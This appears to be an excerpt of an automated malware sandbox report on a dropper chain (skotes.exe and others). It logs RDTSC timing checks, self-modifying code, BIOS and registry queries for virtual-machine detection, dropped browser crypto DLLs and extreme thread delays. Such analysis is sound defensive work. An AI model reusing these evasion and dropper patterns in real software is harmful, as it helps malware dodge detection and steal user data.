                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B341C8 second address: B341CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C5F second address: B34C6C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C6C second address: B34C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C72 second address: B34C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD668F2A63Ch 0x0000000f jo 00007FD668F2A636h 0x00000015 popad 0x00000016 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C8F second address: B34C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C95 second address: B34C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B3619A second address: B361A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD668F2A766h 0x0000000a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B35EEE second address: B35EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B37D64 second address: B37D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B37D68 second address: B37D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B36A2B second address: B36A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B39D21 second address: B39D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5EfYBe3nch.exe Special instruction interceptor: First address: A1886A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5EfYBe3nch.exe Special instruction interceptor: First address: BC1455 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5EfYBe3nch.exe Special instruction interceptor: First address: BC6B46 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5EfYBe3nch.exe Special instruction interceptor: First address: C48EE6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Special instruction interceptor: First address: 97FB5D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Special instruction interceptor: First address: B23EF2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Special instruction interceptor: First address: B233F4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Special instruction interceptor: First address: B4D900 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Special instruction interceptor: First address: BAF9F2 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe Special instruction interceptor: First address: 4EEB68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe Special instruction interceptor: First address: 4EEAA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 100EB68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 100EAA5 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\GIIIIJDHJE.exe Special instruction interceptor: First address: 7EEB68 instructions caused by: Self-modifying code
Source: C:\Users\user\Documents\GIIIIJDHJE.exe Special instruction interceptor: First address: 7EEAA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe Special instruction interceptor: First address: 6EE7A5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe Special instruction interceptor: First address: 6EE68C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe Special instruction interceptor: First address: 8B7D2B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe Special instruction interceptor: First address: 9199FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: 65EB68 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Special instruction interceptor: First address: 65EAA5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe Memory allocated: 2A10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe Memory allocated: 2C10000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe Memory allocated: 2B30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe Code function: 5_2_04DA0B97 rdtsc 5_2_04DA0B97
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe Window / User API: threadDelayed 3830
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe Window / User API: threadDelayed 1259
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7735
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1898
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2803
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2889
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 964
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6003
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4565
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8157
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 639
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3640
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 971
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4065
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7291
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 856
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1474
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3016
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1143
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6514
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1212
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027368001\36ac23ea9d.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\rsn[1].exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027024001\am.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\av3EZhq[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027060001\av3EZhq.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1026850001\rsn.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exe TID: 7424Thread sleep time: -210000s >= -30000sJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7816Thread sleep count: 40 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7816Thread sleep time: -80040s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2944Thread sleep count: 34 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2944Thread sleep time: -68034s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164Thread sleep count: 129 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164Thread sleep time: -3870000s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184Thread sleep count: 38 > 30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8184Thread sleep time: -76038s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8180Thread sleep time: -48024s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8176Thread sleep time: -58029s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 8164Thread sleep time: -30000s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -14757395258967632s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -100000s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99865s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99750s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99599s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99473s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99312s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99156s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -99026s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98921s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98799s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98687s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98578s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98468s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -98359s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97979s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97769s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97640s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97531s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97422s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97312s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97203s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -97093s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96978s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96841s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96729s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96620s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 5900Thread sleep time: -96487s >= -30000s
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe TID: 7652Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 7735 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6708Thread sleep time: -7378697629483816s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1312Thread sleep count: 1898 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1596Thread sleep count: 2803 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5344Thread sleep count: 322 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7588Thread sleep time: -1844674407370954s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7572Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3408Thread sleep count: 2889 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2252Thread sleep count: 964 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6128Thread sleep time: -2767011611056431s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5720Thread sleep time: -21213755684765971s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep time: -8301034833169293s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep count: 8157 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6444Thread sleep time: -6456360425798339s >= -30000s
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep count: 639 > 30
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6408Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 3640 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 971 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7728Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052Thread sleep count: 4065 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6052Thread sleep count: 192 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7444Thread sleep time: -2767011611056431s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7876Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2088Thread sleep time: -5534023222112862s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exe TID: 6688Thread sleep count: 194 > 30
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exe TID: 1816Thread sleep time: -30000s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5856Thread sleep count: 1474 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1704Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3992Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4556Thread sleep count: 3016 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 1143 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5196Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4176Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep count: 6514 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep time: -5534023222112862s >= -30000s
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3484Thread sleep count: 1212 > 30
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                      Source: C:\YQNZByFp\jyidkjkfhjawd.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C46EBF0 PR_GetNumberOfProcessors,GetSystemInfo,2_2_6C46EBF0
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread delayed: delay time: 30000
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 100000
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99865
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99750
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99599
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99473
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99312
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99156
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 99026
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98921
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98799
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98687
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98578
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98468
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 98359
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97979
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97769
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 97640
